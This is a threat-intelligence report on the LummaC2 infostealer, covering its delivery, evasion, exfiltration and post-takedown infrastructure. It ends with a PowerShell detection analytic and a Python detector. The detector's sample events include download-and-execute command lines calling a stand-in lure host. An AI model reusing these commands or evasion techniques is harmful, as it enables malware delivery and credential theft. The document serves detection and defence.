
Starting out 2025 strong, LummaC2 stealer activity dropped sharply after a government takedown in May.
LummaC2, also known as LummaC or Lumma Stealer, is a malware-as-a-service (MaaS) stealer that has been available for purchase on underground forums since at least mid-2022. Subscriptions start at $250 USD per month, all the way up to a one-time payment of $20,000 USD to gain access to Lumma source code. Adversaries favor the MaaS model because they can launch their operations with relative ease and low overhead, giving them access to effective malware like LummaC2 with continuous development, customer support, and a range of features.
Because it’s distributed as a MaaS offering, LummaC2 is used against many targets opportunistically, with no particular industry or geography being an exclusive recipient.
Similar to other stealers, LummaC2 was initially designed to target cryptocurrency wallets, browser information, and 2FA tokens, but it has expanded beyond its original scope. It remains in active development, and over time has added features including customizable stealer configurations and a loader capability for delivering additional payloads via EXE, DLL, or PowerShell.
LummaC2’s popularity peaked in late 2024 and early 2025 as adversaries used it in many paste-and-run campaigns. Its popularity drew attention from international law enforcement and cybersecurity community members, culminating in a takedown of LummaC2 infrastructure in May 2025.
Initial access indicators of compromise (IOC) vary according to the delivery method and loader chosen by the adversary, so early detection telemetry differs from case to case. LummaC2 delivery vehicles have been presented to users in an array of creative ways, including:
Adversaries have also used the same methods to deliver NetSupport Manager, Rhadamanthys, and StealC alongside LummaC2 on the same affected systems.
We described LummaC2’s paste-and-run tactic in our November 2024 Intelligence Insights, and paste-and-run remained a widespread tactic in 2025 for distributing multiple malware families.
In January 2025 we saw LummaC2 threats that began with the victim interacting with fake CAPTCHA-style paste-and-run lures. Successful paste-and-run execution resulted in mshta.exe reaching out to goatstuff[.]store to retrieve PowerShell.
While the atomic indicators for paste-and-run campaigns changed often in 2025, nearly every campaign leading to LummaC2 leveraged Mshta or PowerShell in some fashion, illustrating how adversaries tend to keep portions of their playbooks that “just work.”
Behavioral detection of LummaC2 can vary quite a bit since it requires distributors to use crypters. Multiple detection analytics could catch LummaC2 simply because an adversary configured the crypter in a particular way. Crypters that we’ve observed paired with LummaC2 include PureCrypter and CypherIT.
Depending on the delivery method and adversary configurations, LummaC2 may be injected into a hollowed process—we’ve observed OpenWith.exe and more.com, among others—or leverage DLL side-loading for execution. The stealer activity occurs in memory with direct exfiltration to C2; however, in some cases collected data may be staged in text files like System.txt prior to ZIP archiving for theft. This means that looking for C2 activity or suspicious TXT file creation may also help detect LummaC2. It does not maintain persistence on its own; however, accompanying loaders or follow-on payloads may create and maintain persistence.
LummaC2 relies on HTTPS for exfiltration of data to adversary systems. In late 2023 to early 2024, the developers of the stealer migrated its exfiltration from plaintext HTTP to HTTPS in an effort to evade network-based detection controls. Along with using HTTPS for encrypted communications, LummaC2 developers also leverage Cloudflare services to make their exfiltration systems resilient and highly available.
As the stealer matured in 2024, LummaC2 incorporated more features to remain on the bleeding edge of the stealer market. To ensure data exfiltration even when interrupted, the LummaC2 developers added functionality to send information piecemeal rather than using the “collect, stage, send” technique. In addition, when Google implemented application-bound encryption (ABE) in Chromium browsers, LummaC2 quickly adopted new techniques to obtain browser cookies and bypass ABE.
ABE experimentation continued into 2025, as we observed some instances of LummaC2 using the Chromium --remote-debugging-port technique also used by other malware.
Multiple community members and international law enforcement worked to take down LummaC2 infrastructure in May 2025, and this definitely affected LummaC2 operations. In our own data, we can observe Lumma’s peak in popularity earlier this year followed by a downturn after May.
We observed low levels of LummaC2 in May and June 2025, followed by a solid effort in distribution for July and August. We’ve seen no instances of LummaC2 since October 2025.
Details about infrastructure used by MaaS malware can often provide some insights into the malware’s operations and difficulties. In the case of LummaC2, we can observe changes in Autonomous System Numbers (ASNs) used to host or proxy LummaC2 before and after the takedown. To make this analysis possible, we used passive DNS records for LummaC2 exfiltration domains we observed from open source intelligence during 2025 with a cutoff date of December 30, 2025.
In the case of server hosting, we can see that LummaC2 domains from January to June 2025 almost exclusively resolved to Cloudflare IP addresses.
After June 2025, the DNS records show that Lumma’s operators likely diversified into multiple different hosting providers. While they still attempted to use Cloudflare, operators also explored at least seven hosting providers that are present on the Spamhaus Do Not Route or Peer (DROP) list, which catalogs sections of the internet that tend to carry fraudulent traffic:

AEZA-AS (210644)
AS-VD (47105, 203834)
CHSN-AS (1997865)
PROSPERO-AS (200593)
PROTON66 (198953)
ROUTERHOSTING (149956)
ZHOUYISAT-COMMUNICATIONS (400992)
This trend suggests that Lumma infrastructure was pushed away from using legitimate infrastructure like Cloudflare into hosting providers on less savory portions of the Internet. As a result, organizations using network security tools similar to the DROP list are more likely to block LummaC2 traffic now than in the first half of 2025 before the takedown.
Since LummaC2 has been distributed in so many different ways, preventative measures can take many approaches. We’ve observed LummaC2 distributed in malicious advertisements, fake software installations, paste-and-run campaigns, and more. We’ve also observed it delivered in script form, via DLL sideloads.
General preventative measures that apply to multiple malware families also help fight against LummaC2:
For response, an excellent playbook would look something like this:
invoke-expression to download content

This pseudo-detection analytic identifies instances of PowerShell using invoke-expression to download content from an HTTP URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.
Note: * is a placeholder for strings associated with legitimate use of this function in your environment

process == (powershell)
&&
deobfuscated_command_line_includes (iex || '.invoke' || 'invoke-expression')
&&
deobfuscated_command_line_includes (http)
&&
command_line_does_not_include == (*)
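The pseudo-analytic above, implemented as runnable Python over constructed process events (an added example, not code from the original report). The allowlist value, the event field names, and the lure hostnames are assumptions; the deobfuscation step decodes -EncodedCommand payloads so that an encoded IEX still matches.

```python
import base64
import binascii
import re

# Placeholder for the analytic's "*" exclusion: substrings marking legitimate
# IEX-over-HTTP use in your environment (constructed value; tune per site).
ALLOWLIST = ("chocolatey.org/install.ps1",)
# -EncodedCommand and its short forms carry a base64-encoded UTF-16LE script.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
IEX_PATTERN = re.compile(r"\biex\b|\.invoke|invoke-expression")

def deobfuscate(command_line: str) -> str:
    """Append the decoded script so the checks see what PowerShell will run."""
    def _decode(m: re.Match) -> str:
        try:
            return m.group(0) + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return m.group(0)  # not valid base64/UTF-16LE; leave untouched
    return ENC_FLAG.sub(_decode, command_line)

def matches_iex_download(event: dict) -> bool:
    """Pseudo-analytic: PowerShell AND (iex|.invoke|invoke-expression) AND http, minus allowlist."""
    if event.get("process", "").lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    cl = deobfuscate(event.get("command_line", "")).lower()
    if any(ok in cl for ok in ALLOWLIST):
        return False
    return bool(IEX_PATTERN.search(cl)) and "http" in cl

def detect(events: list) -> list:
    """Return the ids of flagged events, in input order."""
    return [e["id"] for e in events if matches_iex_download(e)]

def _b64_utf16(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample process events; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"id": "evt-1", "process": "powershell.exe", "command_line":
     "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
     ".DownloadString('http://lure.invalid/a.ps1')\""},
    {"id": "evt-2", "process": "powershell.exe", "command_line":  # encoded IEX
     "powershell.exe -nop -w hidden -enc " + _b64_utf16("IEX(iwr http://lure.invalid/p)")},
    {"id": "evt-3", "process": "powershell.exe", "command_line":  # Chocolatey self-install
     "powershell.exe -c \"iex (iwr https://community.chocolatey.org/install.ps1)\""},
    {"id": "evt-4", "process": "mshta.exe", "command_line":  # earlier stage, not PowerShell
     "mshta.exe http://lure.invalid/x.hta"},
    {"id": "evt-5", "process": "powershell.exe", "command_line":  # IEX without a URL
     "powershell.exe -c \"Invoke-Expression 'Get-Date'\""},
]
```

Running detect(SAMPLE_EVENTS) flags evt-1 and evt-2 only; the mshta stage from the paste-and-run lure is out of scope for this PowerShell-specific analytic and needs its own coverage.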